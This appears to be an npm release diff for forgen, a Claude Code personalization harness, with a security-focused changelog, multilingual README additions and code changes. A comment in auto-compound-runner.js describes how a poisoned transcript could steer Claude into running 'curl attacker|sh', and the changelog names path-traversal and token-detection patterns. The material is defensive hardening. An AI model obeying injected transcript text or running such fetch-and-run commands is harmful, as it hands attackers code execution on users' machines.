@wooojin/forgen 0.3.1 → 0.3.2

package/.claude-plugin/plugin.json

@@ -1,7 +1,7 @@
 {
   "$schema": "https://claude.ai/schemas/claude-plugin.json",
   "name": "forgen",
-  "version": "5.1.2",
+  "version": "0.3.2",
   "description": "Claude Code harness — the more you use Claude, the better it gets",
   "author": {
     "name": "jang-ujin",
@@ -10,7 +10,12 @@
   "repository": "https://github.com/wooo-jin/forgen",
   "homepage": "https://github.com/wooo-jin/forgen",
   "license": "MIT",
-  "keywords": ["claude-code", "harness", "personalization", "forge"],
+  "keywords": [
+    "claude-code",
+    "harness",
+    "personalization",
+    "forge"
+  ],
   "skills": "./skills/",
   "agents": "agents/",
   "statusLine": {

package/CHANGELOG.md

@@ -5,6 +5,106 @@ All notable changes to forgen will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [0.3.2] - 2026-04-21
+
+### Security — Audit findings landed
+
+Independent read-only audit (docs/claude-audit-brief.md) surfaced 10 structural
+issues plus 2 follow-up findings. All 12 are fixed with invariant tests.
+
+**P0 — data loss / code injection**
+- **Settings parse-failure data loss** (#2, #10): `settings-injector.ts` and
+  `scripts/postinstall.js` no longer silently replace a malformed settings.json
+  with `{}`. New `readSettingsSafely()` preserves the corrupt original to
+  `settings.json.corrupt-<ts>` and throws; writers release the lock and abort.
+  postinstall settings + `~/.claude.json` now use tmp-file + rename atomic write.
+- **Code injection via node -e** (#5): `session-recovery.ts` no longer
+  interpolates a user-supplied sessionId into a `-e` template literal. A
+  dedicated runner at `dist/hooks/internal/run-lifecycle-check.js` reads the id
+  from argv — no shell, no eval surface.
+- **solution-outcomes race** (#9): all pending-state mutations are now serialised
+  under `withFileLockSync` + `atomicWriteJSON`. Concurrent inject / correction /
+  error hooks on the same session no longer lose or duplicate events.
+- **Archive path traversal** (follow-up #A): `compound-export.importKnowledge`
+  rejects entries whose resolved destination sits outside ME_DIR, including
+  sibling-directory prefix collisions (e.g. `../me-evil/…`).
+
+**P1 — lock semantics, trust, uninstall, injection precision**
+- **Settings-lock live-holder handling** (#1): acquireLock now throws
+  `SettingsLockError` on live-PID timeout instead of overwriting the lock;
+  releaseLock verifies ownership before deleting.
+- **Trust silent escalation** (#3): `preset-manager.computeEffectiveTrust`
+  returns a `Trust 상승` warning when runtime is more permissive than desired;
+  harness surfaces it to the user; fgx cautions `가드레일 우선`/`승인 완화`
+  profile users.
+- **Install/uninstall symmetry** (#7): `uninstall` now strips `FORGEN_*` env
+  keys (previously only `COMPOUND_*`) and recognises `forgen me` (previously
+  only `forgen status`) as the forgen-owned statusLine.
+- **Legacy profile guard** (#6): `loadProfile` runs `isV1Profile` and returns
+  null on legacy shapes so bootstrap re-runs cutover instead of typing stale
+  JSON as v1.
+- **secret-filter vendor tokens** (follow-up #B): GitHub PATs (ghp_/gho_/
+  ghs_/ghu_/ghr_), Google API keys (AIza…), and Slack tokens (xox[abpors]-…)
+  are now detected.
+
+**P2 — label truth, transcript attribution**
+- **permission-handler labels** (#4): `approve()`/`approveWithWarning()` never
+  set `permissionDecision: 'allow'`; they are pass-through. Log and API labels
+  renamed to `safe-pass-through` / `autopilot-warn-pass-through` /
+  `autopilot-pass-through` / `pass-through` so audit trails match reality.
+- **Transcript per-session attribution** (#8): `spawn.ts` snapshots existing
+  transcripts before launching claude and diffs after exit; concurrent sessions
+  in the same cwd no longer cross-attribute. Transcript reading switched to
+  streaming (`createReadStream` + `readline`).
+
+### Added — Data hygiene
+
+Field audit on a ~2-week-old install found 10,802 files in `~/.forgen/state/`
+across 12 filename prefixes, 4.3 MB `match-eval-log.jsonl`, and 80% of
+error-attribution events concentrated on 3 solutions injected at relevance
+0.15–0.21.
+
+- `forgen doctor --prune-state` (new `src/core/state-gc.ts`): removes session-
+  scoped files older than 7 days (checkpoint-, injection-cache-, modified-
+  files-, outcome-pending-, permissions-, skill-trigger-, tool-state-,
+  reminder-, context-, last-). Aggregate jsonl logs are preserved.
+- `solution-outcomes.attributeError` gates: match_score ≥ 0.3,
+  injection-lag ≤ 5 min, top-3 by relevance. Prevents blanket blaming of
+  every injected solution when a tool fails.
+- `solution-injector.MIN_INJECT_RELEVANCE = 0.3` + multi-tag precision gate
+  (`matchedIdentifiers ≥ 1 OR matchedTags ≥ 2`): the matcher remains
+  permissive for recall@5; only the injection step enforces the stricter
+  gate. Zero single-tag high-score injections observed in the field corpus
+  after landing.
+- `match-eval-log.jsonl` size-based rotation at 10 MB (one generation
+  retained).
+
+### Fixed — e2e test isolation
+
+Docker-spawned hooks in `tests/e2e/*.test.ts` were writing session state
+(`e2e-tool-chain`, `chain5-test`, etc.) into the developer's real
+`~/.forgen/state/`. Each e2e file now allocates a fresh `mkdtempSync` HOME
+and injects it into the spawn env; `afterAll` cleans up. Likewise
+`tests/hook-response-tracking.test.ts` now mocks `node:os` so the tracking
+log never lands outside `/tmp/`.
+
+### Fixed — Stale Docker verify checks
+
+`tests/e2e/docker/verify.sh` was asserting three skills that were deleted in
+commit f534227 (v0.3 quality refactor). Result goes from 62/4/6 to 63/0/6
+without touching runtime code.
+
+### Notes
+
+- All fixes confirmed via invariant tests (1732/1732 pass across 143 files),
+  7 real-world attack scenarios (injection, concurrent mutation, corrupt
+  settings, path traversal, prune, doctor smoke), and Linux-clean-environment
+  Docker verification.
+- Upgrade path from 0.3.1 verified (profile + solutions + non-forgen settings
+  byte-identical after upgrade).
+- Windows code paths exist but runtime validation is deferred to GH Actions
+  Windows runner — see P-D note in release audit.
+
 ## [0.3.1] - 2026-04-16
 
 ### Added — Self-Evolving Harness (inspired by Stanford meta-harness)

package/README.ja.md

@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20（SQLite セッション検索には >= 22 を推奨）
 - **Claude Code** インストール・認証済み（`npm i -g @anthropic-ai/claude-code`）
 
+> **ベンダー依存:** forgen は Claude Code をラップします。Anthropic API または Claude Code の変更が動作に影響する可能性があります。Claude Code 1.0.x でテスト済みです。
+
+---
+
+## なぜ forgen か
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 全員に同じ             | Yes                 | Yes              | **No**          |
+| 修正から学習           | No                  | No               | **Yes**         |
+| エビデンスベースのライフサイクル| No          | No               | **Yes**         |
+| 悪いパターンを自動リタイア| No              | No               | **Yes**         |
+| パーソナライズされたルール| No               | No               | **Yes**         |
+| ランタイム依存関係     | -                   | many             | **3**           |
+
+### forgen が向いているケース
+
+**向いている場合:**
+- 数週間かけて Claude があなたのパターンを学習する長期プロジェクト
+- AI の振る舞いに強いこだわりがある開発者
+- Compound 知識の恩恵を受ける繰り返しパターンがあるコードベース
+
+**向いていない場合:**
+- 使い捨てのスクリプトや一時的なプロトタイプ
+- Claude Code がない環境
+- すべてのメンバーに同じ AI 動作が必要なチーム（forgen は個人用であり、チーム向けではありません）
+
+**forgen + oh-my-claudecode:** 一緒に使えます。OMC はオーケストレーション（エージェント、ワークフロー）を、forgen はパーソナライゼーション（プロファイル、学習）を担当します。[共存ガイド](docs/guides/with-omc.md) を参照してください。
+
 ---
 
 ## 仕組み

package/README.ko.md

@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20 (SQLite 세션 검색은 >= 22 권장)
 - **Claude Code** 설치 및 인증 (`npm i -g @anthropic-ai/claude-code`)
 
+> **벤더 의존성:** forgen은 Claude Code를 래핑합니다. Anthropic API 또는 Claude Code 변경이 동작에 영향을 줄 수 있습니다. Claude Code 1.0.x 기준으로 테스트되었습니다.
+
+---
+
+## 왜 forgen인가
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 모두에게 동일           | Yes                 | Yes              | **No**          |
+| 교정에서 학습           | No                  | No               | **Yes**         |
+| Evidence 기반 라이프사이클| No               | No               | **Yes**         |
+| 나쁜 패턴 자동 은퇴      | No                  | No               | **Yes**         |
+| 개인화된 규칙           | No                  | No               | **Yes**         |
+| 런타임 의존성           | -                   | many             | **3**           |
+
+### 언제 사용하면 좋은가
+
+**잘 맞는 경우:**
+- 몇 주에 걸쳐 Claude가 패턴을 학습하는 장기 프로젝트
+- AI 행동 방식에 강한 선호가 있는 개발자
+- Compound 지식의 혜택을 받는 반복 패턴이 있는 코드베이스
+
+**맞지 않는 경우:**
+- 일회성 스크립트나 임시 프로토타입
+- Claude Code가 없는 환경
+- 모든 구성원이 동일한 AI 행동이 필요한 팀 (forgen은 개인용이지, 팀용이 아님)
+
+**forgen + oh-my-claudecode:** 함께 사용할 수 있습니다. OMC는 오케스트레이션(에이전트, 워크플로우)을, forgen은 개인화(프로필, 학습)를 담당합니다. [공존 가이드](docs/guides/with-omc.md)를 참고하세요.
+
 ---
 
 ## 동작 방식

package/README.md

@@ -109,7 +109,7 @@ Facets are micro-adjusted based on accumulated evidence. If your corrections con
 
 ### Next session
 
-Updated rules are rendered with your corrections included. Compound knowledge is searchable via MCP. Claude gets better at being *your* Claude.
+Updated rules are rendered with your corrections included. Compound knowledge is searchable via MCP. Retrieval precision grows as your personal accumulation grows — the mechanism is in place from day 1 (starter-pack covers common dev queries on a fresh install), and the signal-to-noise ratio improves over roughly 2–4 weeks of real use as low-fitness solutions are auto-demoted and your specific patterns get promoted.
 
 ---
 
@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20 (>= 22 recommended for SQLite session search)
 - **Claude Code** installed and authenticated (`npm i -g @anthropic-ai/claude-code`)
 
+> **Vendor dependency:** Forgen wraps Claude Code. Anthropic API or Claude Code changes may affect behavior. Tested with Claude Code 1.0.x.
+
+---
+
+## Why forgen
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| Same for everyone      | Yes                 | Yes              | **No**          |
+| Learns from corrections| No                  | No               | **Yes**         |
+| Evidence-based lifecycle| No                 | No               | **Yes**         |
+| Auto-retires bad patterns| No               | No               | **Yes**         |
+| Personalized rules     | No                  | No               | **Yes**         |
+| Runtime dependencies   | -                   | many             | **3**           |
+
+### When to use forgen
+
+**Good fit:**
+- Long-running projects where Claude learns your patterns over weeks
+- Developers with strong preferences about how AI should behave
+- Codebases with recurring patterns that benefit from compound knowledge
+
+**Not a fit:**
+- One-off scripts or throwaway prototypes
+- Environments without Claude Code
+- Teams that need identical AI behavior for all members (forgen is personal, not team-wide)
+
+**forgen + oh-my-claudecode:** They work together. OMC provides orchestration (agents, workflows); forgen provides personalization (profile, learning). See [Coexistence Guide](docs/guides/with-omc.md).
+
 ---
 
 ## How It Works
@@ -209,12 +238,16 @@ solution-injector matches: starter-error-handling-patterns (0.70)
 Claude sees: "Matched solutions: error-handling-patterns [pattern|0.70]
              Use try/catch with specific error types. Always log original error..."
                     ↓
-Claude writes better error handling code, informed by your accumulated patterns.
+Claude has your accumulated patterns in context while drafting the response.
 ```
 
+Precision gates (v0.3.2+): matches below relevance 0.3 or with only a single
+common-word tag overlap are filtered before injection so Claude's context
+doesn't get polluted by low-signal hits.
+
 ### 10 built-in skills
 
-Curated, compound-native skills. Each one integrates with accumulated knowledge — they get better every session.
+Curated, compound-native skills. Each integrates with your accumulated knowledge — effectiveness compounds as your personal solution base grows.
 
 **Core chain** (build → learn):
 

package/README.zh.md

@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20（SQLite 会话搜索推荐 >= 22）
 - **Claude Code** 已安装并认证（`npm i -g @anthropic-ai/claude-code`）
 
+> **厂商依赖:** forgen 封装了 Claude Code。Anthropic API 或 Claude Code 的变更可能影响其行为。已在 Claude Code 1.0.x 版本下测试。
+
+---
+
+## 为什么选择 forgen
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 对所有人相同           | Yes                 | Yes              | **No**          |
+| 从纠正中学习           | No                  | No               | **Yes**         |
+| 基于证据的生命周期     | No                  | No               | **Yes**         |
+| 自动淘汰不良模式       | No                  | No               | **Yes**         |
+| 个性化规则             | No                  | No               | **Yes**         |
+| 运行时依赖             | -                   | many             | **3**           |
+
+### 适用场景
+
+**适合使用:**
+- Claude 可以在数周内学习你的模式的长期项目
+- 对 AI 行为方式有强烈偏好的开发者
+- 有重复模式、能从 Compound 知识中获益的代码库
+
+**不适合使用:**
+- 一次性脚本或临时原型
+- 没有 Claude Code 的环境
+- 需要所有成员 AI 行为完全一致的团队（forgen 是个人化的，不面向团队）
+
+**forgen + oh-my-claudecode:** 可以一起使用。OMC 负责编排（智能体、工作流）; forgen 负责个性化（档案、学习）。详情请参阅 [共存指南](docs/guides/with-omc.md)。
+
 ---
 
 ## 工作原理

package/dist/cli.js

@@ -159,10 +159,10 @@ const commands = [
     },
     {
         name: 'doctor',
-        description: 'Diagnostics',
-        handler: async (_args) => {
+        description: 'Diagnostics (--prune-state to GC stale session files)',
+        handler: async (args) => {
             const { runDoctor } = await import('./core/doctor.js');
-            await runDoctor();
+            await runDoctor({ pruneState: args.includes('--prune-state') });
         },
     },
     // install --plugin 제거됨 — postinstall이 유일한 설치 경로

package/dist/core/auto-compound-runner.js

@@ -279,10 +279,13 @@ try {
 ---
 ${sanitizedSummary.slice(0, 6000)}
 ---`;
+    // P1-S1 fix (2026-04-20): 과거에는 `--allowedTools Bash`로 전체 Bash 권한을 줘서
+    // 악성 transcript(공급망 인젝션)가 filter를 우회해 `curl attacker|sh` 같은 명령을
+    // 피해자 권한으로 실행시킬 수 있었다. 이제 `Bash(forgen compound:*)`로 좁혀 Claude
+    // 가 compound 추출용 forgen CLI 호출만 가능하게 한다. filter-bypass 시에도 임의
+    // 명령 실행 차단.
     try {
-        execClaudeRetry(['-p', solutionPrompt, '--allowedTools', 'Bash', '--model', COMPOUND_MODEL], {
-            cwd, timeout: 90_000, stdio: ['pipe', 'ignore', 'pipe'],
-        });
+        execClaudeRetry(['-p', solutionPrompt, '--allowedTools', 'Bash(forgen compound:*)', '--model', COMPOUND_MODEL], { cwd, timeout: 90_000, stdio: ['pipe', 'ignore', 'pipe'] });
     }
     catch (e) {
         process.stderr.write(`[forgen-auto-compound] solution extraction: ${e instanceof Error ? e.message : String(e)}\n`);

package/dist/core/dashboard.js

@@ -13,7 +13,14 @@
  */
 import * as fs from 'node:fs';
 import * as path from 'node:path';
-import { ME_SOLUTIONS, ME_RULES, ME_BEHAVIOR, STATE_DIR, V1_EVIDENCE_DIR, } from './paths.js';
+import { createRequire } from 'node:module';
+// P0-1 fix (2026-04-20): ESM `"type": "module"` 프로젝트에서 `require`가 글로벌에
+// 없어 이전에는 renderFitnessSummary 안의 `require('../engine/solution-fitness.js')`가
+// 항상 ReferenceError로 catch 경로에 떨어져 Solution Fitness 대시보드 섹션이
+// 조용히 무효화됐다 (정상처럼 "아직 outcome 이벤트 데이터 없음" 출력).
+// createRequire로 CJS require를 ESM 환경에 부트스트랩 — session-store.ts 패턴 동일.
+const require = createRequire(import.meta.url);
+import { ME_SOLUTIONS, ME_RULES, ME_BEHAVIOR, STATE_DIR, } from './paths.js';
 import { parseFrontmatterOnly } from '../engine/solution-format.js';
 import { readMatchEvalLog } from '../engine/match-eval-log.js';
 // ── ANSI color helpers ──
@@ -361,11 +368,11 @@ export function collectLearningCurve() {
     const axisCounts = new Map();
     const uniqueDays = new Set();
     try {
-        if (fs.existsSync(V1_EVIDENCE_DIR)) {
-            const files = fs.readdirSync(V1_EVIDENCE_DIR).filter(f => f.endsWith('.json'));
+        if (fs.existsSync(ME_BEHAVIOR)) {
+            const files = fs.readdirSync(ME_BEHAVIOR).filter(f => f.endsWith('.json'));
             for (const f of files) {
                 try {
-                    const data = JSON.parse(fs.readFileSync(path.join(V1_EVIDENCE_DIR, f), 'utf-8'));
+                    const data = JSON.parse(fs.readFileSync(path.join(ME_BEHAVIOR, f), 'utf-8'));
                     if (!data.timestamp)
                         continue;
                     const ts = new Date(data.timestamp).getTime();

package/dist/core/doctor.d.ts

@@ -1 +1,6 @@
-export declare function runDoctor(): Promise<void>;
+export interface DoctorOptions {
+    /** When true, delete stale session-scoped state files instead of just
+     *  reporting bloat. Triggered by `forgen doctor --prune-state`. */
+    pruneState?: boolean;
+}
+export declare function runDoctor(opts?: DoctorOptions): Promise<void>;

package/dist/core/doctor.js

@@ -4,6 +4,7 @@ import * as path from 'node:path';
 import { execFileSync } from 'node:child_process';
 import { FORGEN_HOME, LAB_DIR, ME_BEHAVIOR, ME_DIR, ME_PHILOSOPHY, ME_SOLUTIONS, ME_RULES, ME_SKILLS, PACKS_DIR, SESSIONS_DIR, STATE_DIR } from './paths.js';
 import { getTimingStats } from '../hooks/shared/hook-timing.js';
+import { countSessionScopedFiles, pruneState } from './state-gc.js';
 /** ~/.claude/projects/ — Claude Code 세션 저장 경로 */
 const CLAUDE_PROJECTS_DIR = path.join(os.homedir(), '.claude', 'projects');
 function check(label, condition, hint) {
@@ -24,7 +25,7 @@ function commandExists(cmd) {
         return false;
     }
 }
-export async function runDoctor() {
+export async function runDoctor(opts = {}) {
     console.log('\n  Forgen — Diagnostics\n');
     console.log('  [Tools]');
     check('claude CLI', commandExists('claude'));
@@ -305,6 +306,25 @@ export async function runDoctor() {
         }
         console.log();
     }
+    // State bloat check — session-scoped files accumulate until pruned.
+    console.log('  [State Hygiene]');
+    const sessionFiles = countSessionScopedFiles();
+    if (sessionFiles === 0) {
+        console.log('  ✓ no session-scoped state files');
+    }
+    else if (sessionFiles < 500) {
+        console.log(`  ✓ ${sessionFiles} session-scoped files (under threshold)`);
+    }
+    else {
+        console.log(`  ⚠ ${sessionFiles} session-scoped files (bloat threshold 500)`);
+        console.log('    Run: forgen doctor --prune-state   (removes files older than 7 days)');
+    }
+    if (opts.pruneState) {
+        const report = pruneState({ dryRun: false });
+        const mb = (report.bytesFreed / 1024 / 1024).toFixed(2);
+        console.log(`  → Pruned ${report.pruned}/${report.scanned} files (${mb} MB freed, >${report.retentionDays}d old)`);
+    }
+    console.log();
     // 현재 디렉토리 git 정보
     console.log('  [Git]');
     try {

package/dist/core/global-config.d.ts

@@ -37,7 +37,7 @@ export interface GlobalConfig {
     /** 레거시 마이그레이션 백업 경로 */
     legacy_backup?: string;
 }
-/** v1 config 로드 (~/.forgen/config.json 우선, 레거시 폴백) */
+/** 글로벌 config 로드 (~/.forgen/config.json) */
 export declare function loadGlobalConfig(): GlobalConfig;
-/** v1 config 저장 (~/.forgen/config.json) */
+/** 글로벌 config 저장 (~/.forgen/config.json) */
 export declare function saveGlobalConfig(config: GlobalConfig): void;

package/dist/core/global-config.js

@@ -1,26 +1,18 @@
 import * as fs from 'node:fs';
 import * as path from 'node:path';
-import { GLOBAL_CONFIG, V1_GLOBAL_CONFIG } from './paths.js';
-/** v1 config 로드 (~/.forgen/config.json 우선, 레거시 폴백) */
+import { GLOBAL_CONFIG } from './paths.js';
+/** 글로벌 config 로드 (~/.forgen/config.json) */
 export function loadGlobalConfig() {
-    // v1 경로 우선
-    if (fs.existsSync(V1_GLOBAL_CONFIG)) {
-        try {
-            return JSON.parse(fs.readFileSync(V1_GLOBAL_CONFIG, 'utf-8'));
-        }
-        catch { /* fall through */ }
-    }
-    // 레거시 폴백
     if (fs.existsSync(GLOBAL_CONFIG)) {
         try {
             return JSON.parse(fs.readFileSync(GLOBAL_CONFIG, 'utf-8'));
         }
-        catch { /* fall through */ }
+        catch { /* malformed — use defaults */ }
     }
     return {};
 }
-/** v1 config 저장 (~/.forgen/config.json) */
+/** 글로벌 config 저장 (~/.forgen/config.json) */
 export function saveGlobalConfig(config) {
-    fs.mkdirSync(path.dirname(V1_GLOBAL_CONFIG), { recursive: true });
-    fs.writeFileSync(V1_GLOBAL_CONFIG, JSON.stringify(config, null, 2));
+    fs.mkdirSync(path.dirname(GLOBAL_CONFIG), { recursive: true });
+    fs.writeFileSync(GLOBAL_CONFIG, JSON.stringify(config, null, 2));
 }

package/dist/core/harness.d.ts

@@ -5,11 +5,9 @@
  * philosophy/scope/pack 의존 제거. Profile + Preset Manager + Rule Renderer.
  *
  * Module Structure:
- * - Lines 1-70: Imports, utility helpers
- * - Lines 70-220: injectSettings — Claude Code settings.json injection
- * - Lines 220-400: Agent/skill installation helpers
- * - Lines 400-550: Rule file injection, gitignore, compound memory
- * - Lines 550+: prepareHarness — main orchestration
+ * - Lines 1-50: Imports, utility helpers
+ * - Lines 50-120: Rule file injection, gitignore, compound memory
+ * - Lines 120+: prepareHarness — main orchestration
  */
 import { type RuntimeHost } from './types.js';
 import { rollbackSettings } from './settings-lock.js';